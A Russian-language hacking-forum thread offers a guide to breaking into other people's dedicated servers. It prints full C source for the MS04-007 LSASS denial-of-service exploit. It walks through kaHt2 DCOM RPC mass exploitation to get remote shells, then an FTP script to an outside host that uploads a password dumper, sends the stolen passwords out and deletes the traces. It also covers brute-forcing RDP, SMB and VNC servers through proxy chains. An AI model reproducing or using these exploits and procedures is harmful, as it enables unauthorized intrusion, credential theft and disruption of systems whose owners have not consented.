First Of Hack

Объявление

НАШ НОВЫЙ САЙТ http://xakz.org ЗАХОДИТЕ, РЕГИСТРИРУЙТЕ, Т.К. ЭТОГО ФОРУМА БОЛЬШЕ НЕ БУДЕТ!

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » First Of Hack » Статьи » Способ взломов дедиков


Способ взломов дедиков

Сообщений 1 страница 3 из 3

1

1.Эксплойтами
MS04-007 LSASS.EXE Win2k Pro Remote Denial-of-Service
14 февраля, 2004
Выпущен PoC код, Эксплуатирующий недавно обнаруженную уязвимость в Microsoft ASN.1 Library ("msasn1.dll"). Удаленный пользователь может аварийно завершить работу системы.
Описание: eEye Digital Security обнаружила несколько уязвимостей в Microsoft Windows, позволяющих удаленному пользователю скомпрометировать уязвимую систему.

Переполнение буфера обнаружено в Microsoft ASN.1 Library ("msasn1.dll") в процессе ASN.1 BER декодирования. Уязвимость может эксплуатироваться через различные службы (Kerberos, NTLMv2) и приложения, использующих сертификаты. Удаленный пользователь может послать специально обработанные ASN.1 данные к службе или приложению, чтобы выполнить произвольный код с SYSTEM привилегиями.

Код:
Microsoft Windows ASN.1 Remote DoS Exploit (MS04-007)
 

/*
 *  MS04-007 LSASS.EXE Win2k Pro Remote Denial-of-Service Exploit
 *
 *  Copyright (C) 2004  Christophe Devine
 *
 *  This program is free software; you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation; either version 2 of the License, or
 *  (at your option) any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with this program; if not, write to the Free Software
 *  Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
 */

 /*
  *   > MS04-007-dos.exe 10.0.0.1 445
  *   connect failed
  *
  *   > nbtstat -A 10.0.0.1
  *   [..]
  *       SERVER3        <20>  UNIQUE      Registered
  *   [..]
  *   > MS04-007-dos.exe 10.0.0.1 139 SERVER3
  *   > MS04-007-dos.exe 10.0.0.1 139 SERVER3
  *   >
  *
  *   if the exploit works, LSASS gets killed,
  *   and after 1mn the server reboots.
  *  
  */

//#define WIN32

#ifdef WIN32

#include <winsock2.h>
#include <windows.h>

#else

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

#endif

#include <stdio.h>

/****************************************************************/

unsigned char netbios_sess_req[] =

/* NetBIOS Session Request */

"\x81\x00\x00\x44"

"\x20\x45\x45\x45\x46\x45\x47\x45\x42\x46\x46\x45\x4D\x46\x45\x43"
"\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43"
"\x41\x00"

"\x20\x45\x45\x45\x46\x45\x47\x45\x42\x46\x46\x45\x4D\x46\x45\x43"
"\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x41"
"\x41\x00";

/****************************************************************/

unsigned char negotiate_req[] =

/* NetBIOS Message Type + Length & SMB Header */

"\x00\x00\x00\xB3"

"\xFF\x53\x4D\x42\x72\x00\x00\x00\x00\x08\x01\xC8\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x75\x03\x00\x00\x02\x00"

/* Negotiate Protocol Request, actually sniffed from smbclient */

"\x00\x90\x00\x02\x50\x43\x20\x4E\x45\x54\x57\x4F\x52\x4B\x20\x50"
"\x52\x4F\x47\x52\x41\x4D\x20\x31\x2E\x30\x00\x02\x4D\x49\x43\x52"
"\x4F\x53\x4F\x46\x54\x20\x4E\x45\x54\x57\x4F\x52\x4B\x53\x20\x31"
"\x2E\x30\x33\x00\x02\x4D\x49\x43\x52\x4F\x53\x4F\x46\x54\x20\x4E"
"\x45\x54\x57\x4F\x52\x4B\x53\x20\x33\x2E\x30\x00\x02\x4C\x41\x4E"
"\x4D\x41\x4E\x31\x2E\x30\x00\x02\x4C\x4D\x31\x2E\x32\x58\x30\x30"
"\x32\x00\x02\x44\x4F\x53\x20\x4C\x41\x4E\x4D\x41\x4E\x32\x2E\x31"
"\x00\x02\x53\x61\x6D\x62\x61\x00\x02\x4E\x54\x20\x4C\x41\x4E\x4D"
"\x41\x4E\x20\x31\x2E\x30\x00\x02\x4E\x54\x20\x4C\x4D\x20\x30\x2E"
"\x31\x32\x00";

/****************************************************************/

unsigned char setup_request[] =

/* NetBIOS Message Type + Length & SMB Header */

"\x00\x00\xCC\xCC"

"\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x08\x01\xC8\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x75\x03\x00\x00\x03\x00"

/* Session Setup AndX Request */

"\x0C\xFF\x00\x00\x00\xFF\xFF\x02\x00\x01\x00\x00\x00\x00\x00\xCC"
"\xCC\x00\x00\x00\x00\x5C\x00\x00\x80\xCC\xCC";

/* Security Blob: SPNEGO OID + ASN.1 stuff */

unsigned char security_blob[] =

/* Application Constructed Object + SPNEGO OID */

"\x60\x82\xCC\xCC\x06\x06\x2B\x06\x01\x05\x05\x02"

/* negTokenInit + Constructed Sequence */

"\xA0\x82\xCC\xCC\x30\x82\xCC\xCC"

/* mechType: NTLMSSP OID */

"\xA0\x0E\x30\x0C\x06\x0A\x2B\x06\x01\x04\x01\x82\x37\x02\x02\x0A"

/* reqFlags that should trigger the overflow */

"\xA1\x05\x23\x03\x03\x01\x07"

/* mechToken: NTLMSSP (room for shellcode here) */

"\xA2\x82\xCC\xCC\x04\x82\xCC\xCC"

"\x4E\x54\x4C\x4D\x53\x53\x50\x00\x01\x00\x00\x00\x15\x02\x08\x60"
"\x09\x00\x09\x00\x20\x00\x00\x00\x07\x00\x07\x00\x29\x00\x00\x00"
"\x57\x4F\x52\x4B\x47\x52\x4F\x55\x50\x44\x45\x46\x41\x55\x4C\x54";

/* Native OS & LAN Manager */

unsigned char other_stuff[] =

"\x00\x55\x00\x6E\x00\x69\x00\x78\x00\x00\x00\x53\x00\x61\x00\x6D"
"\x00\x62\x00\x61\x00\x00\x00";

/****************************************************************/

int main( int argc, char *argv[] )
{
    unsigned char buf[4096];
    struct hostent *server_host;
    struct sockaddr_in server_addr;
    int i, len, server_fd, n1, n2, n3;

#ifdef WIN32

    WSADATA wsa;

    /* initialize windows sockets */

    if( WSAStartup( MAKEWORD(2,0), &wsa ) )
    {
        fprintf( stderr, "WSAStartup failed\n" );
        return( 1 );
    }

#endif

    if( argc != 3 && argc != 4 )
    {
        fprintf( stderr, "usage: %s <target hostname> "
                         "<port> [netbios name]\n",
                 argv[0] );

        return( 1 );
    }

    /* resolve the server hostname and connect */

    server_host = gethostbyname( argv[1] );

    if( server_host == NULL )
    {
        fprintf( stderr, "gethostbyname(%s) failed\n", argv[1] );
        return( 1 );
    }

    memcpy( (void *) &server_addr.sin_addr,
            (void *) server_host->h_addr,
            server_host->h_length );

    sscanf( argv[2], "%d", &i );

    server_addr.sin_family = AF_INET;
    server_addr.sin_port   = htons( (unsigned short) i );

    server_fd = socket( AF_INET, SOCK_STREAM, IPPROTO_IP );

    if( server_fd < 0 )
    {
        fprintf( stderr, "could not create socket\n" );
        return( 1 );
    }

    len = sizeof( server_addr );

    if( connect( server_fd, (struct sockaddr *)
                 &server_addr, len ) < 0 )
    {
        fprintf( stderr, "connect failed\n" );
        return( 1 );
    }

    if( argc == 4 )
    {
        /* encode the Called NetBIOS Name */

        len = sizeof( netbios_sess_req ) - 1;
        memcpy( buf, netbios_sess_req, len );
        memset( buf + 5, 'A', 32 );

        for( i = 0; i < (int) strlen( argv[3] ); i++ )
        {
            buf[5 + i * 2] += argv[3][i] >> 4;
            buf[6 + i * 2] += argv[3][i] & 15;
        }

        for( ; i < 16; i++ )
        {
            buf[5 + i * 2] += 0x20 >> 4;
            buf[6 + i * 2] += 0x20 & 15;
        }

        /* 1. NetBIOS Session Request */

        if( send( server_fd, buf, len, 0 ) != len )
        {
            fprintf( stderr, "send(NetBIOS Session Request) failed\n" );
            return( 1 );
        }

        if( recv( server_fd, buf, sizeof( buf ), 0 ) <= 0 )
        {
            fprintf( stderr, "recv(NetBIOS Session Response) failed\n" );
            return( 1 );
        }

        if( buf[0] == 0x83 )
        {
            fprintf( stderr, "NetBIOS Session rejected "
                             "(wrong NetBIOS name ?)\n" );
            return( 1 );
        }
    }

    /* 2. Negotiate Protocol Request */

    len = sizeof( negotiate_req ) - 1;

    if( send( server_fd, negotiate_req, len, 0 ) != len )
    {
        fprintf( stderr, "send(Negotiate Protocol Request) failed\n" );
        return( 1 );
    }

    if( recv( server_fd, buf, sizeof( buf ), 0 ) <= 0 )
    {
        fprintf( stderr, "recv(Negotiate Protocol Response) failed\n" );
        return( 1 );
    }

    /* 3. Session Setup AndX Request */

    memset( buf, 'A', sizeof( buf ) );

    n1 = sizeof( setup_request ) - 1;
    n2 = sizeof( security_blob ) - 1;
    n3 = sizeof( other_stuff   ) - 1;

    memcpy( buf,           setup_request, n1 );
    memcpy( buf + n1,      security_blob, n2 );

    n2 += 2000; /* heap padding for shellcode */

    memcpy( buf + n1 + n2, other_stuff,   n3 );

    len = n1 + n2 + n3;

    buf[ 2] = ( ( len - 4 ) >> 8 ) & 0xFF;      /* NetBIOS msg length   */
    buf[ 3] = ( ( len - 4 )      ) & 0xFF;

    buf[51] = ( n2      ) & 0xFF;               /* Security Blob Length */
    buf[52] = ( n2 >> 8 ) & 0xFF;

    buf[61] = ( ( n2 + n3 )      ) & 0xFF;      /* Byte Count (BCC)     */
    buf[62] = ( ( n2 + n3 ) >> 8 ) & 0xFF;

    buf[n1 +  2] = ( ( n2 -  4 ) >> 8 ) & 0xFF; /* ACO Length           */
    buf[n1 +  3] = ( ( n2 -  4 )      ) & 0xFF;

    buf[n1 + 14] = ( ( n2 - 16 ) >> 8 ) & 0xFF; /* negTokenInit Length  */
    buf[n1 + 15] = ( ( n2 - 16 )      ) & 0xFF;

    buf[n1 + 18] = ( ( n2 - 20 ) >> 8 ) & 0xFF; /* Constr. Seq. Length  */
    buf[n1 + 19] = ( ( n2 - 20 )      ) & 0xFF;

    buf[n1 + 45] = ( ( n2 - 47 ) >> 8 ) & 0xFF; /* mechToken Length     */
    buf[n1 + 46] = ( ( n2 - 47 )      ) & 0xFF;

    buf[n1 + 49] = ( ( n2 - 51 ) >> 8 ) & 0xFF; /* String Length        */
    buf[n1 + 50] = ( ( n2 - 51 )      ) & 0xFF;

    if( send( server_fd, buf, len, 0 ) != len )
    {
        fprintf( stderr, "send(Session Setup AndX Request) failed\n" );
        return( 1 );
    }

    recv( server_fd, buf, sizeof( buf ), 0 );

    shutdown( server_fd, 2 );

    return( 0 );
}

Компилировать надо

Второй эксплоит который мы рассмотрим это kaht2...........
Для того,чтобы прваильно заюзать эксплоит нам нужна программа PassViev (только PRO версия),pablos_ftp_server
1.52 ну и сакм кахт2
Для удобства пользования Размещаем софт по винту в определённом порядке. Сам FTPServer, kaHt2.exe и EXPORT.BAT ставим в директорию C:/., А PassViev cуём в папку C:/TEMP (Если её нет, то создайте сами) и переименовываем PassViev.exe в 6.exe (для большего удобства), или в любое другое, на ваш выбор, главное что бы вы потом не мучались набирать это в командной строке.

EXPORT.BAT должен находится в одном архиве с КаХтом, если же всё-таки не нашли то создаём EXPORT.BAT файл своими руками в любимом блокноте с текстом

@Echo off
6.exe Export.txt

и сохраняем как EXPORT.BAT. Всё Батник готов. Заметьте: во второй строке стоит 6.exe, это то имя в которое вы переименовали свой PassViev. Если Вы переименовали в другое то в напишите именно его в батнике EXPORT.BAT.

Теперь давайте настроим FTP сервер на своём компутере. Запустите FTPServer и войдите в User accounts, нажимаем ADD, Вас просят ввести имя юзера, пишем: a. Далее вас просят выбрать каталог куда будут заливатся стыренные файлы, выберете папку темп которую мы недавно с Вами создавали на диске ЦЕ. Потом Вас просят ввести пароль для юзера a, парольставим тоже: a. Потом проставляем везде галочки. Теперь все изменения сохраняем и приступаем к основным действиям.

Открываем диск C:, убеждаемся что там присутствует КаХт. Потом Запускаем командную строку (пуск>программы>стандартные>командная строка). Перетаскиваем КаХт с папки в комндную строку (нажмите на КаХт левой кнопкой мыши и перетеащите в окно консоли).
Далее появляется текст: C:>C:kahHt2.exe
Продолжаем эту строку: пробел
Должно получится: C:>C:kaHt2.exe 192.168.0.1 192.168.0.245 (пример на моей локалке, у Вас же диапазон может быть другой)
Жмём Enter.
Перед Вами появляется:

Код:
KAHT II - MASSIVE RPC EXPLOIT

DCOM RPC exploit. Modified by aT4@3wdesign.es

#haxorcitos && #localhost @Efnet Ownz you!!!

PUBLIC VERSION :P

____________________________________________

[+] tARGETS : 192.168.0.1-192.168.0.245 WITH 50 tHREADS

[+] Attacking Port: 135. Remote Shell port: 32968

[+] Scan In Progress...

- Connecting to 192.168.0.8

Sending Exploit to a [WinXP] Server... FAILED

- Connecting to 192.168.0.13

ну короче говоря ещё всякое дерьмо появится которое нам не надо. В итоге когда сканер найдёт потенциальную жертву появится :

Microsoft Windows XP [Версия 5.1.2600]

(С) Корпорация Майкрософт, 1985-2001.

C:windowssystem32>

Всё, можешь радоваться, ты на чужом компе в директории SYSTEM32.

Далее в консоли пишем:

cd.. Жмём Enter видим C:windows>

cd..Жмём Enter видим C:

Теперь с помощью команды cd program files перейдём в папку С:Program Files.

Видим:

C:Program files сюда мы перешли чтоб особо не палится

Далее узнаём свой IP адрес. Для премера будем использовать мой в локалке 192.168.0.7

Пишем в консоли:

C:Program files>echo open 57.66.158.44>go.txt&&echo a>>go.txt&&echo a>>go.txt

жмем Enter

Видим: C:Program files>

Это мы с Вами создали текстовый документ (он нам понадобится для соединения с вашим FTP сервером) в папке Program files на удалённой машине, в котором содержится 3 строки:

open 57.66.158.44

a

a

Буквы a, это имя и пароль которые Вы создали в FTPServer`е.

Теперь запускаем FTPServer , нажимаем на зелёную стрелочку в левом верхнем углу программы. Вам написали, что сервер запущен.

Теперь коннектим удалённый комп к себе по FTP.

Пишем в командной строке:

C:Program files>ftp -s:go.txt

В своём FTP сервере, в раздел Server Log ты должен увидеть следующее:

FTP Server started on port 21

[3892] Client connected from IP

[3892] Welcome to Pablo's FTP Server

[3892] USER a

[3892] 331 Password required for a

[3892] PASS a

[3892] 230 User successfully logged in.

Это всё означает, что ты всё правильно сделал и законнектил вражеский комп к себе на ФТП, далее на надо залить PAssView.exe (мы переименовали его в 6.exe) на этот комп.

Пишем get 6.exe жмём Enter

В своём FTP сервере, в раздел Server Log ты должен увидеть следующее:

[1456] PORT IP

[1456] 200 Port command successful.

[1456] STOR 6.exe

[1456] 150 Opening BINARY mode data connection for file transfer

[1456] 226 Transfer complee

В консоли Пишем get export.bat жмём Enter - это мы отправили наш батник, видим В своём FTP сервере, в раздел Server Log ты должен увидеть следующее

[1456] PORT IP

[1456] 200 Port command successful.

[1456] STOR Export.bat

[1456] 150 Opening BINARY mode data connection for file transfer

[1456] 226 Transfer complee

Код:
Всё, мы отправили необходимые файлы на комп жертвы.

Теперь пишем bye - это мы отсоединяем комп от нашего ФТП сервера.



и снова мы видим:

C:Program files>

Пишем C:Program files>export.bat это мы запустили export.bat который соберёт нам все наши пароли и сохранит их в файле export.txt

Для больше уверенности в том что export.txt уже создан наберите в консоли:

C:Program files>dir

И Вы увидите все файлы и папки в директории C:Program files, там же увидите и наши закаченные файлы.



И наконец последний шаг.

Снова коннектим комп по ФТП:

C:Program files>ftp -s:go.txt жмём Enter

В своём FTP сервере, в раздел Server Log ты должен увидеть следующее:

Вы снова увидите:

FTP Server started on port 21

[3892] Client connected from IP

[3892] Welcome to Pablo's FTP Server

[3892] USER a

[3892] 331 Password required for a

[3892] PASS a

[3892] 230 User successfully logged in.



Сразу после этого в консоли вводите:

send export.txt

В своём FTP сервере, в раздел Server Log ты должен увидеть следующее:

[1456] PORT IP

[1456] 200 Port command successful.

[1456] STOR export.txt

[1456] 150 Opening BINARY mode data connection for file transfer.

[1456] 226 Transfer complete



Это означает что мы скопривали себе в папку TEMP,которую создавали на диске ЦЕ, файл export.txt



Далее заметаем следы:

пишем bye жмём ввод

И снова видим: 

C:Program files>

Далее поочерёдно вводим команды для удаления закаченных нами файлов:

del go.txt

del 6.exe

del export.bat

del export.txt

Скачать Кахт Можоун

2.Брут дедиков
Как мы все знаем брутер это самый эффективный и тупой метод взлом асек,дедиков and etc
Рассмотрим некоторые брутеры дедиков:
Самый известный брутер для дедиков это Ntscan
Делает она следующее: при выборе определённого диапазона она сканирует сервера на предмет простых паролей (simple passwords). Программа имеет довольно неплохой выбор метода атаки, и вероятность взлома сервером с её помощью очень велика, так как админы часто ставят простые пароли к серверу, особенно на забугорных. Прога работает по принципу брута: посылает запрос на авторизацию на сервере и получает ответ от севера. В случае успешной авторизации выводит список серверов в нижней части программы. Теперь главное выбрать диапазон сканирования и настроить программу для эффективной работы. Сверху мы вписываем диапазон IP серверов, как вы наверно уже поняли. Далее, HostFile - список хостов (я не использовал эту опцию), здесь можно создать файл с конкретными хостами и брутить конкретные хосты. Потоки я оставлял как есть: 50, Timeout - аналогично. ConnectShare - подключение к расшаренным ресурсам. Можно выбирать метод атаки: IPCscan, SMBscan, WMIscan. Далее, "ping from host" - пинговать хосты, то есть проверка на живучесть хоста, перед попыткой атаки, чтобы не брутить в холостую мёртвые хосты. Scan host opened port - сканировать хосты с открытым портом 139, но так же можно и изменить при желании. Speed - скорость работы брута (перебора паролей).
TSGrinder 2.03
Программа для подбора паролей к MS RDP службе. Поддерживает множество потоков, баннеры входа в систему, l33t преобразование. Программа требует установки Microsoft Simulated Terminal Server Client tool, "roboclient".
DownLoad
Также дедики можно брутить прогой Hydra
3.[/b]Добыча дедиков от Te$t[/b]
Первое, что нам нужно это прямые руки, свежая или чуть пьяная голова =)
FreeCap - Предназначен для соксификации программ не умеющих работать с
прокси серверами самостоятельно. Пару SOCKS-проксов для безопасности, а
лучше цепочку . Здесь я не буду описывать принцип работы с этой программой,
но вы знайте, что все действия я проделываю именно через нее...

Начнем.

Искать мы будем vnc-server т.е. Virtual Network Computing.
Первое что нам нужно, это хороший VNC-сканер, я знаю 2 сканера:
это PHP-сканер от Гемаглобина и RealVNC Bypass Authentication Scanner
Свой выбор я оставил за RealVNC Bypass Authentication Scanner,
т.к. он прост в использовании и реально ищет по диапазонам, а нам это и нужно. Итак скачиваем данный сканер, распаковываем его к примеру в: X:\XXX\ где Х - буква вашего диска, а ХХХ - папка куда вы его распаковали. И запускаем из cmd.exe Пример:
cd X:\XXX - переходим в папку со сканером
Х:\XXX\VNC.exe - запускаем сканер,
где он нам выдаст следущую информацию:
Код:
Microsoft Windows XP [Версия 5.1.2600]
(С) Корпорация Майкрософт, 1985-2001.
X:\>VNC.exe

================================================[rev-0.0.1]==
========RealVNC <= 4.1.1 Bypass Authentication Scanner=======
============multi-threaded for Linux and Windows=============
================================================== ==[win32]==
MAIN MENU
================================================== ===========

[+] Usage: VNC_bypauth <target> <scantype> <option>
[-] <target>:
___________________
|___-p____|___-i____|

[-] <scantype>:
____________________
|___-cT___|___-vnc___|
[-] <option>:
__________________________________________________ ______
|___-v____|___-vv____|___-T___|__-tc___|__-tr___|__-tt___|

[+] Type VNC_bypauth <target>,<scantype> or <option> for more informations
[+] To increase the speed under linux, try ulimit -s unlimited

X:\>
Осюда мы видим набор ключей по работе со сканером...
Вбиваем далее:
X:\XXX\VNC.exe -i XXX.XXX.XXX.XXX-XXX.XXX.XXX.XXX -p5900 -vnc
где: -i диапазон ip -р порт -vnc Виртуальные сервера
В то-же время в папке \ХХХ\ у нас появляеться файл VNC_bypauth.txt,
куда сохраняются все результаты программы. Открываем и видим:
Код:
---------------------------------------------------------------------------
COMMAND: VNC.exe -i xxx.xx.xxx.x-xxx.xxx.xxx.xxx -p 5900 -vnc
----------------------------------------------------------------------------
xxx.xx.xxx.xx :5900 vnc4: banned
xxx.xx.xxx.xx :5900 vnc4: nothing received
xxx.xx.xxx.x :5900 connection closed
xxx.xx.xxx.xxx :5900 vnc4: patched
xxx.xx.xxx.xxx :5900 vnc4: VULNERABLE
----------------------------------------------------------------------------
Scan complete
--------------------------------------------[heapoverflow.com 2004-2005]----
из результата видно, что сканер понятным образом сохраняет результаты, где бажные
сервера подписаны как VULNERABLE, с такими мы и будем работать...
Теперь к нам на помощь приходит программа BL4CK-vncviewer-authbypass она
позволяет подключится к бажному серверу, на подобии
Подключение к удаленному рабочему столу(mstsc.exe)

Способ №2

Ищем и качаем программу DSNS v. 1.0

очень хороший между прочим сканер портов .
Вбиваем диапазон, порт и ждем, через некоторое время сканер
выдает нам много открытых портов =). После окончания сканировнаия, сохраняем
данный диапазон в Results\Export results одним диапазоном, без портов.
Теперь настала очередь программы VNCMASS, в которую мы вбиваем только что
насканеные диапазоны и давим Start All. Программа прочекает и автоматически подключиться к бажным дедикам.. Вот и все.
Советую работать со сканерами через дедики, т.к. вбили диапазон и пошли спать, а наутро подключились и смотрим результаты.

Ссылки на скачивание:

Это всеми известный способ теста добычи VNC-дедиков..

Я решил объединить взлом дедиков от KROT_f!nd и от te$t...
Берём VNC сканер и начинаем сканировать....

Посканировав диапозон айпи вы видим в строке найдено(FOUND) определённые айпи.

Затем берём Ntscan
и вставляем насканенные айпи-адреса с надписью patched и VULNERABLE.
Затем ставим указываем путь к файл.txt и ставим порт 5900 и ставим брутить.
Ntscan сразу начнём перебирать пароли и логины.

УДАЧНОГО БРУТА!

0

2

Как брутить я брутил брутил и не фига ни как

0

3

прол

0


Вы здесь » First Of Hack » Статьи » Способ взломов дедиков